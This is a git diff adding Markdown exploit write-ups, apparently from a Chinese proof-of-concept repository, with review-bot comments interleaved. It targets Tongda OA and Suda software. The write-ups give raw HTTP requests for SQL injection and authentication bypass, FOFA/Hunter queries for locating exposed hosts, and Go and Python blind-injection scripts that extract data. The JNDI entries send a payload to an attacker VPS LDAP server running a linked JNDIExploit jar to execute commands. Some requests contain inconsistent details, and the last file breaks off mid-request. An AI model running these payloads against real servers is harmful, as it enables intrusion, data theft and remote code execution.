b/通达OA-get_datas.php前台sql注入.md @@ -0,0 +1,26 @@ +## 通达OA get_datas.php前台sql注入 + +## fofa +``` +app="TDXK-通达OA" +``` + +## POC +``` +POST /general/reportshop/utils/get_datas.php HTTP/1.1 +Host: {{HostName}} +Accept-Encoding: gzip, deflate +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Length: 2 + +USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5 where 1={`\='` 1} union (select uid,sid from user_online where 1\={`=` 1})-- '1** +``` +![image](https://github.com/wy876/POC/assets/139549762/55ba1ee3-215b-4fd2-8c0c-0694a20f6bfd) + +![image](https://github.com/wy876/POC/assets/139549762/3d0399a3-9fe9-46d9-b725-12acb84d422c) + + +## 漏洞来源 +``` +https://forum.butian.net/share/278 +``` diff --git a/通达OA-header身份认证绕过漏洞.md b/通达OA-header身份认证绕过漏洞.md new file mode 100644 index 0000000..96550e3 --- /dev/null +++ b/通达OA-header身份认证绕过漏洞.md 
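Review bot: `通达OA-down.php接口存在未授权访问漏洞.md` is added with exactly the content of the existing `通达OA down.php接口存在未授权访问漏洞.md` (the new file's index `5bba152` is the old blob of the existing file), differing only by a hyphen in the filename; keep one and delete the other, otherwise every later fix must be made twice, and this same hunk already shows the existing copy diverging (it gains an image the new copy lacks). In the `get_datas.php` POC, `Content-Length: 2` does not match the `USER_ID=...` body that follows, so any server honouring the header truncates the request; drop the header or set the real length.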
@@ -0,0 +1,29 @@ +## 通达OA header身份认证绕过漏洞 +通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件,通达OA2013,通达OA2016,通达OA2017 存在身份认证绕过漏洞,攻击者通过构造特定的数据包,获取登录cookie,利用cookie进行未授权访问。 + +## fofa +``` +title="office Anywhere" +``` + + +## poc +``` +POST /module/retrieve_pwd/header.inc.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 1024 + +_SESSION[LOGIN_THEME]=15&_SESSION[LOGIN_USER_ID]=1&_SESSION[LOGIN_UID]=1&_SESSION[LOGIN_FUNC_STR]=1,3,42,643,644,634,4,147,148,7,8,9,10,16,11,130,5,131,132,256,229,182,183,194,637,134,37,135,136,226,253,254,255,536,24,196,105,119,80,96,97,98,114,126,179,607,539,251,127,238,128,85,86,87,88,89,137,138,222,90,91,92,152,93,94,95,118,237,108,109,110,112,51,53,54,153,217,150,239,240,218,219,43,17,18,19,15,36,70,76,77,115,116,185,235,535,59,133,64,257,2,74,12,68,66,67,13,14,40,41,44,75,27,60,61,481,482,483,484,485,486,487,488,489,490,491,492,120,494,495,496,497,498,499,500,501,502,503,505,504,26,506,507,508,515,537,122,123,124,628,125,630,631,632,633,55,514,509,29,28,129,510,511,224,39,512,513,252,230,231,232,629,233,234,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,200,202,201,203,204,205,206,207,208,209,65,187,186,188,189,190,191,606,192,193,221,550,551,73,62,63,34,532,548,640,641,642,549,601,600,602,603,604,46,21,22,227,56,30,31,33,32,605,57,609,103,146,107,197,228,58,538,151,6,534,69,71,72,223,639, + +``` +![image](https://github.com/wy876/POC/assets/139549762/b5cf4a04-f5e9-47d5-b463-528fac5133c0) + +第二步:验证cookie是否有效 +![image](https://github.com/wy876/POC/assets/139549762/161f8b28-059c-4132-b9b7-8435dd124e14) + +![image](https://github.com/wy876/POC/assets/139549762/f44e5dc2-2a95-4900-9f71-9001ef870980) diff --git a/通达OA-sql注入漏洞-CVE-2023-4165.md b/通达OA-sql注入漏洞-CVE-2023-4165.md new file mode 100644 index 0000000..d73a0d8 --- /dev/null 
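Review bot: `Content-Length: 1024` does not match the `_SESSION[...]` body, so the request as written is truncated or rejected; remove the header and let the tool compute it. The body ends with a trailing comma (`...223,639,`) followed by an empty line, which reads like a paste cut mid-list; confirm the `LOGIN_FUNC_STR` value is complete. The affected versions (2013/2016/2017) appear only in the intro sentence; give them an `影响版本` section as the other 通达OA entries have, and `第二步` appears without a `第一步` label on the request above it.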
+++ b/通达OA-sql注入漏洞-CVE-2023-4165.md 
@@ -0,0 +1,128 @@ +## 通达OA sql注入漏洞 CVE-2023-4165 + +## 影响版本 +``` +通达OA ≤ v11.10,v2017 +``` +## poc +``` +GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1 +Host: 127.0.0.1:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` +## FOFA语法: +``` +app="TDXK-通达OA" && icon_hash="-759108386" + +``` +## 利用脚本 +### go +```go +package main + +import ( + "fmt" + "net/http" + "strings" + "time" +) +// 通达OA CVE-2023-4165&CVE-2023-4166 注入漏洞 +func main() { + // /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1 general/system/seal_manage/dianju/delete_log.php + url := "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php" // 目标网站的URL + delay := 2 // 延迟时间,单位为秒 + cookieValue := "PHPSESSID=pv74trjff1qshvt5dktujjfbq3; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=ec800c19" // 替换为有效的Cookie值 + + characters := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!@#$%^&*()+-" // 可能的字符集 + + result := "" + for i := 1; i <= 30; i++ { // 假设字符的最大长度为30 + found := false + for _, char := range characters { + payload := fmt.Sprintf("1) and (substr(USER(),%d,1))=char(%d) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1", i, int(char)) // 构造payload + //print(payload, "n") + req, err := http.NewRequest("GET", url, nil) + if err != nil { + fmt.Println("创建请求失败:", err) + return + } + + // 使用分号分隔的每个Cookie项 + cookieItems := strings.Split(cookieValue, "; ") + for _, item := range cookieItems { + itemSplit := strings.SplitN(item, "=", 
2) // 按照等号(=)分隔键值对 + if len(itemSplit) == 2 { + cookie := &http.Cookie{ + Name: itemSplit[0], + Value: itemSplit[1], + } + req.AddCookie(cookie) + } + } + + req.URL.RawQuery = "DELETE_STR=" + payload //构建请求,其DELETE_STR是本次的注入参数 + + startTime := time.Now() + resp, err := http.DefaultClient.Do(req) + if err != nil { + fmt.Println("发送请求失败:", err) + return + } + defer resp.Body.Close() + + endTime := time.Now() + responseTime := endTime.Sub(startTime) + + if responseTime >= time.Duration(delay)*time.Second { + result += string(char) + fmt.Println("", result) + found = true + break + } + } + + if !found { + break + } + } + + fmt.Println("Database: " + result) +} +``` + +### Python +```python +import requests +import time + +headers={"Cookie":"PHPSESSID=hji419h9o5gc4dk3ftfqocmu42; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=baae495a"} + +characters = "abcdefghijklmnopqrstuvwxyz0123456789_!@#$%^&*()+-" + +url = "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=" + +result = "" + +for i in range(1,31): + found = False + for c in characters: + payload = f"1) and (substr(USER(),{i},1))=char({ord(c)}) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1" + start_time = time.time() + res = requests.get(url=url+payload,headers=headers) + end_time = time.time() + elapsed_time = end_time - start_time + + if elapsed_time >= 2: + result +=c + print(result) + found = True + if not found: + break + +print("Databas:",result) +``` diff --git a/通达OA-sql注入漏洞-CVE-2023-4166.md b/通达OA-sql注入漏洞-CVE-2023-4166.md new file mode 100644 index 0000000..2adf9bf --- /dev/null +++ b/通达OA-sql注入漏洞-CVE-2023-4166.md 
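Review bot: both scripts label the extracted value `Database:` (Python: `Databas:`), but the payload they send is `substr(USER(),...)`, so the label misdescribes the output; either query `DATABASE()` as the POC request above does or change the label to `User:`. In the Go script, `defer resp.Body.Close()` sits inside the inner loop, so no response body is closed until `main` returns and every connection of the 30 x len(characters) iterations stays open; close the body explicitly at the end of each iteration. `cookieValue` and `headers` embed captured `PHPSESSID` and `SID_1` values that should be placeholders, and the commented-out `//print(payload, "n")` debugging line should be removed.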
@@ -0,0 +1,132 @@ +## 通达OA sql注入漏洞 CVE-2023-4166 +复现版本:11.7版 + +## 影响版本 +``` +通达OA ≤ v11.10,v2017 +``` + +## poc +``` +GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1 +Host: 127.0.0.1:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +``` + +## FOFA语法: +``` +app="TDXK-通达OA" && icon_hash="-759108386" + +``` +## 利用脚本 +### go +```go +package main + +import ( + "fmt" + "net/http" + "strings" + "time" +) +// 通达OA CVE-2023-4165&CVE-2023-4166 注入漏洞 +func main() { + // /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1 general/system/seal_manage/dianju/delete_log.php + url := "http://127.0.0.1/general/system/seal_manage/dianju/delete_log.php" // 目标网站的URL + delay := 2 // 延迟时间,单位为秒 + cookieValue := "PHPSESSID=pv74trjff1qshvt5dktujjfbq3; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=ec800c19" // 替换为有效的Cookie值 + + characters := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!@#$%^&*()+-" // 可能的字符集 + + result := "" + for i := 1; i <= 30; i++ { // 假设字符的最大长度为30 + found := false + for _, char := range characters { + payload := fmt.Sprintf("1) and (substr(USER(),%d,1))=char(%d) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1", i, int(char)) // 构造payload + //print(payload, "n") + req, err := http.NewRequest("GET", url, nil) + if err != nil { + fmt.Println("创建请求失败:", err) + return + } + + // 使用分号分隔的每个Cookie项 + cookieItems := strings.Split(cookieValue, "; ") + for _, item := range cookieItems { + itemSplit := strings.SplitN(item, "=", 2) // 按照等号(=)分隔键值对 + if 
len(itemSplit) == 2 { + cookie := &http.Cookie{ + Name: itemSplit[0], + Value: itemSplit[1], + } + req.AddCookie(cookie) + } + } + + req.URL.RawQuery = "DELETE_STR=" + payload //构建请求,其DELETE_STR是本次的注入参数 + + startTime := time.Now() + resp, err := http.DefaultClient.Do(req) + if err != nil { + fmt.Println("发送请求失败:", err) + return + } + defer resp.Body.Close() + + endTime := time.Now() + responseTime := endTime.Sub(startTime) + + if responseTime >= time.Duration(delay)*time.Second { + result += string(char) + fmt.Println("", result) + found = true + break + } + } + + if !found { + break + } + } + + fmt.Println("Database: " + result) +} +``` + +### Python +```python +import requests +import time + +headers={"Cookie":"PHPSESSID=hji419h9o5gc4dk3ftfqocmu42; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=baae495a"} + +characters = "abcdefghijklmnopqrstuvwxyz0123456789_!@#$%^&*()+-" + +url = "http://127.0.0.1/general/system/seal_manage/dianju/delete_log.php?DELETE_STR=" + +result = "" + +for i in range(1,31): + found = False + for c in characters: + payload = f"1) and (substr(USER(),{i},1))=char({ord(c)}) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1" + start_time = time.time() + res = requests.get(url=url+payload,headers=headers) + end_time = time.time() + elapsed_time = end_time - start_time + + if elapsed_time >= 2: + result +=c + print(result) + found = True + if not found: + break + +print("Databas:",result) +``` + +![](./assets/20231104223332.png) diff --git a/通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600).md b/通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600).md new file mode 100644 index 0000000..65dc353 --- /dev/null +++ b/通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600).md 
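Review bot: the Go and Python scripts here are copies of the ones in `通达OA-sql注入漏洞-CVE-2023-4165.md`, differing only in the `delete_log.php` vs `delete_seal.php` path (the shared comment `CVE-2023-4165&CVE-2023-4166` already admits this); keep one script that takes the endpoint as a parameter so the `Database:`/`USER()` label mismatch, the `defer resp.Body.Close()` inside the loop and the hard-coded `PHPSESSID`/`SID_1` values are fixed in one place rather than two. `复现版本:11.7版` is useful information; the CVE-2023-4165 file should carry the same line.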
@@ -0,0 +1,28 @@ +# 通达OA前台submenu.php存在SQL注入漏洞(CVE-2024-10600) + +pda/appcenter/submenu.php 未包含inc/auth.inc.php且 $appid 参数未用'包裹导致前台SQL注入 + +## 影响范围 + +v2017-v11.6 + +## fofa + +```javascript +app="TDXK-通达OA" && icon_hash="-759108386" +``` + +## poc + +```javascript +http://192.168.0.106/pda/appcenter/submenu.php?appid=1%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B) +``` + +![53147e26ebbc31217d5db726977a1f4f](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411101147145.png) + + + +## 漏洞来源 + +- https://github.com/LvZCh/td/issues/3 +- https://mp.weixin.qq.com/s/TL1QWIpSpnrqcJ4rTXTTdQ diff --git a/速达软件技术(广州)有限公司多款产品doGetAccsetList存在JNID注入漏洞.md b/速达软件技术(广州)有限公司多款产品doGetAccsetList存在JNID注入漏洞.md new file mode 100644 index 0000000..a708012 --- /dev/null +++ b/速达软件技术(广州)有限公司多款产品doGetAccsetList存在JNID注入漏洞.md 
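Review bot: the fofa query and the POC URL are fenced as ```javascript, which is wrong for a search expression and a URL; use a bare ``` fence as the `fofa`/`poc` blocks in the other 通达OA entries do. `影响范围` gives `v2017-v11.6` but no fixed version, which is the number a defender actually needs; the linked issue may state it. The root-cause sentence (`未包含inc/auth.inc.php且 $appid 参数未用'包裹`) is the most useful line in this patch for anyone writing a fix or a detection rule; the sibling 通达OA entries have no such line and would benefit from one each.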
@@ -0,0 +1,76 @@ +# 速达软件技术(广州)有限公司多款产品doGetAccsetList存在JNID注入漏洞 + +# 一、漏洞简介 +速达软件技术(广州)有限公司多款产品doGetAccsetList存在JNID注入漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 速达软件技术(广州)有限公司多款产品 + +# 三、资产测绘 ++ hunter`web.body="速达软件技术(广州)有限公司"` ++ 特征 + +![1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5.png](./img/Vh0u6SfE9CYrencQ/1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5-024504.png) + +![1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae.png](./img/Vh0u6SfE9CYrencQ/1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae-424849.png) + +# 四、漏洞复现 +1. 获取dnslog + +```plain +s7c4np.dnslog.cn +``` + +![1705076444377-d57cc238-fa42-4943-b568-cd8f02ef3dbb.png](./img/Vh0u6SfE9CYrencQ/1705076444377-d57cc238-fa42-4943-b568-cd8f02ef3dbb-942093.png) + +2. 检测是否存在漏洞 + +```plain +GET /login/login!doGetAccsetList.action?report=${jndi:ldap://s7c4np.dnslog.cn} HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cookie: JSESSIONID=95B4E05547D0C692CF0D0DD69AC5241B +Connection: close +``` + +![1705076482745-7d180eeb-6296-47ee-927f-7091624b3756.png](./img/Vh0u6SfE9CYrencQ/1705076482745-7d180eeb-6296-47ee-927f-7091624b3756-118860.png) + +漏洞利用 + +[JNDIExploit-1.4-SNAPSHOT.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222146364-082044c2-ac87-44a7-811f-9736dc52da70.jar) + +将`JNDIExploit-1.4-SNAPSHOT.jar`上传到`vps` + +```plain +java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip +``` + +![1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb.png](./img/Vh0u6SfE9CYrencQ/1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb-351326.png) + +```plain +GET 
/login/login!doGetAccsetList.action?report=${jndi:ldap://vpsip:1389/Basic/TomcatEcho} HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +cmd: whoami +Cookie: JSESSIONID=95B4E05547D0C692CF0D0DD69AC5241B +Connection: close +``` + +![1705076557686-ad6fd9ba-b8ba-48ba-92df-0f088046963b.png](./img/Vh0u6SfE9CYrencQ/1705076557686-ad6fd9ba-b8ba-48ba-92df-0f088046963b-079061.png) + + + +> 更新: 2024-02-29 23:55:46 +> 原文: \ No newline at end of file diff --git a/速达软件技术(广州)有限公司多款产品doSavePrintTpl存在JNID注入漏洞.md b/速达软件技术(广州)有限公司多款产品doSavePrintTpl存在JNID注入漏洞.md new file mode 100644 index 0000000..dfff7c1 --- /dev/null +++ b/速达软件技术(广州)有限公司多款产品doSavePrintTpl存在JNID注入漏洞.md 
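Review bot: the filename, title and `漏洞简介` say `JNID注入`, but the payload is `${jndi:ldap://...}`, i.e. JNDI injection; the same typo recurs in every 速达 entry in this patch and should be fixed consistently, since it also defeats searching the repository. `Cookie: JSESSIONID=95B4E05547D0C692CF0D0DD69AC5241B` is a captured session value and should be a placeholder. `漏洞利用` links a prebuilt `JNDIExploit-1.4-SNAPSHOT.jar` from a yuque attachment with no source or checksum; point to the upstream project or record a hash so reviewers can verify the binary before anyone runs it.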
@@ -0,0 +1,78 @@ +# 速达软件技术(广州)有限公司多款产品doSavePrintTpl存在JNID注入漏洞 + +# 一、漏洞简介 +速达软件技术(广州)有限公司多款产品doSavePrintTpl存在JNID注入漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 速达软件技术(广州)有限公司多款产品 + +# 三、资产测绘 ++ hunter`web.body="速达软件技术(广州)有限公司"` ++ 特征 + +![1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5.png](./img/QAbLP8DmRYya9Ntj/1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5-904597.png) + +![1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae.png](./img/QAbLP8DmRYya9Ntj/1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae-167294.png) + +# 四、漏洞复现 +1. 获取dnslog + +```plain +dffd7g.dnslog.cn +``` + +![1705076759218-f2ad57b9-38b3-4bfb-8f69-79043a410b56.png](./img/QAbLP8DmRYya9Ntj/1705076759218-f2ad57b9-38b3-4bfb-8f69-79043a410b56-744974.png) + +2. 检测是否存在漏洞 + +```plain +GET /common/print/print!doSavePrintTpl.action?report=${jndi:ldap://dffd7g.dnslog.cn}&&rptid=1&employId=1&accsetName=1&modId=1 HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cookie: JSESSIONID=95B4E05547D0C692CF0D0DD69AC5241B +Connection: close +``` + +![1705076798010-03a14e61-09f8-48d9-9296-d38fd1468d27.png](./img/QAbLP8DmRYya9Ntj/1705076798010-03a14e61-09f8-48d9-9296-d38fd1468d27-576024.png) + +![1705076811911-81f56a2d-56c6-419b-947c-0451210e8e69.png](./img/QAbLP8DmRYya9Ntj/1705076811911-81f56a2d-56c6-419b-947c-0451210e8e69-461086.png) + +漏洞利用 + +[JNDIExploit-1.4-SNAPSHOT.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222146317-10daccfd-9800-4fa7-899a-ce904aab6f1d.jar) + +将`JNDIExploit-1.4-SNAPSHOT.jar`上传到`vps` + +```plain +java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip +``` + 
+![1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb.png](./img/QAbLP8DmRYya9Ntj/1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb-838512.png) + +```plain +GET /common/print/print!doSavePrintTpl.action?report=${jndi:ldap://vpsip:1389/Basic/TomcatEcho}&&rptid=1&employId=1&accsetName=1&modId=1 HTTP/1.1 +Host: +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +cmd: whoami +Cookie: JSESSIONID=95B4E05547D0C692CF0D0DD69AC5241B +Connection: close +``` + +![1705076893410-959d7fbf-d434-483d-b195-e12231942b95.png](./img/QAbLP8DmRYya9Ntj/1705076893410-959d7fbf-d434-483d-b195-e12231942b95-014530.png) + + + +> 更新: 2024-02-29 23:55:46 +> 原文: \ No newline at end of file diff --git a/速达软件技术(广州)有限公司多款产品doSavePrintTpl存在SQL注入漏洞.md b/速达软件技术(广州)有限公司多款产品doSavePrintTpl存在SQL注入漏洞.md new file mode 100644 index 0000000..ab4246f --- /dev/null +++ b/速达软件技术(广州)有限公司多款产品doSavePrintTpl存在SQL注入漏洞.md 
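Review bot: same `JNID` to `JNDI` typo as the other 速达 entries. In both request lines the query string reads `...}&&rptid=1`, a doubled `&` that submits an empty parameter; it is harmless but looks like a copy-paste slip and should be a single `&`. The session cookie `JSESSIONID=95B4E05547D0C692CF0D0DD69AC5241B` is reused verbatim from the `doGetAccsetList` file and should be a placeholder.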
@@ -0,0 +1,51 @@ +# 速达软件技术(广州)有限公司多款产品doSavePrintTpl存在SQL注入漏洞 + +# 一、漏洞简介 +速达软件技术(广州)有限公司多款产品doSavePrintTpl存在SQL注入漏洞 + +# 二、影响版本 ++ 速达软件技术(广州)有限公司多款产品 + +# 三、资产测绘 ++ hunter`web.body="速达软件技术(广州)有限公司"` ++ 特征 + +![1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5.png](./img/Si9C0gSG68Sdjyok/1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5-608754.png) + +![1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae.png](./img/Si9C0gSG68Sdjyok/1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae-495074.png) + +# 四、漏洞复现 +```plain +GET /common/print/print!doSavePrintTpl.action?report=1&rptid=1&employId=1&accsetName=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&modId=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=95EE3D005EFC17F6D1246339EA7617CB +Upgrade-Insecure-Requests: 1 +``` + +![1705074370016-a37fced7-17fc-4b64-aab5-352671640d38.png](./img/Si9C0gSG68Sdjyok/1705074370016-a37fced7-17fc-4b64-aab5-352671640d38-736967.png) + +sqlmap + +```plain +GET /common/print/print!doSavePrintTpl.action?report=1&rptid=1&employId=1&accsetName=1&modId=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=95EE3D005EFC17F6D1246339EA7617CB +Upgrade-Insecure-Requests: 1 +``` + +![1705074401317-a2a6a0cf-f844-4f08-83f7-8af83f6a4834.png](./img/Si9C0gSG68Sdjyok/1705074401317-a2a6a0cf-f844-4f08-83f7-8af83f6a4834-074768.png) + + + +> 更新: 2024-02-29 23:55:46 +> 原文: \ No newline at end of file 
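Review bot: `漏洞简介` is the title repeated with no impact statement or root cause, unlike the JNDI entries for the same product; say at least which parameter is injectable (`accsetName`, judging from where the `WAITFOR DELAY` payload is placed) and what the consequence is. The block under `sqlmap` is a second raw request with no command line, so it is unclear what the screenshot demonstrates. `Host:` is empty and `Cookie: JSESSIONID=95EE3D005EFC17F6D1246339EA7617CB` should be a placeholder.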
diff --git a/速达软件技术(广州)有限公司多款产品home_jsontest存在JNID注入漏洞.md b/速达软件技术(广州)有限公司多款产品home_jsontest存在JNID注入漏洞.md new file mode 100644 index 0000000..5e8dc63 --- /dev/null +++ b/速达软件技术(广州)有限公司多款产品home_jsontest存在JNID注入漏洞.md 
@@ -0,0 +1,72 @@ +# 速达软件技术(广州)有限公司多款产品home_jsontest存在JNID注入漏洞 + +# 一、漏洞简介 +速达软件技术(广州)有限公司多款产品home_jsontest存在JNID注入漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 速达软件技术(广州)有限公司多款产品 + +# 三、资产测绘 ++ hunter`web.body="速达软件技术(广州)有限公司"` ++ 特征 + +![1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5.png](./img/vbR5mYTuE8woTkQt/1699201284929-aa4ce68c-746e-4b42-b2a6-5ee57011daf5-774482.png) + +![1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae.png](./img/vbR5mYTuE8woTkQt/1699201312048-19df152b-1307-4860-87ac-d74fe2d646ae-980863.png) + +# 四、漏洞复现 +1. 获取dnslog + +```plain +56tcas.dnslog.cn +``` + +![1705075555323-9faae18e-4bfa-4803-a7d5-9408d85060f0.png](./img/vbR5mYTuE8woTkQt/1705075555323-9faae18e-4bfa-4803-a7d5-9408d85060f0-593145.png) + +2. 检测是否存在漏洞 + +```plain +GET /login/home_jsontest.action?reqType=json&ISLOGIN=TRUE&eid=1&msg=1&errNo=${jndi:ldap://56tcas.dnslog.cn} HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: JSESSIONID=96BFB09D9ED705FAF1EFD3CF45ECFFFC +Connection: close +``` + +![1705075600920-3fb66b0b-cb28-4cef-9746-025483e9b4b3.png](./img/vbR5mYTuE8woTkQt/1705075600920-3fb66b0b-cb28-4cef-9746-025483e9b4b3-699206.png) + +![1705075633851-0f65cea0-d544-45dc-b23d-8a1bb4d513db.png](./img/vbR5mYTuE8woTkQt/1705075633851-0f65cea0-d544-45dc-b23d-8a1bb4d513db-391053.png) + +漏洞利用 + +[JNDIExploit-1.4-SNAPSHOT.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222146440-fd7d4f17-a37c-4c78-b216-daf75b276c2c.jar) + +将`JNDIExploit-1.4-SNAPSHOT.jar`上传到`vps` + +```plain +java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsip +``` + +![1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb.png](./img/vbR5mYTuE8woTkQt/1705075364344-caf730e8-f910-4617-87ae-297aec05dbeb-265724.png) + +```plain +GET 
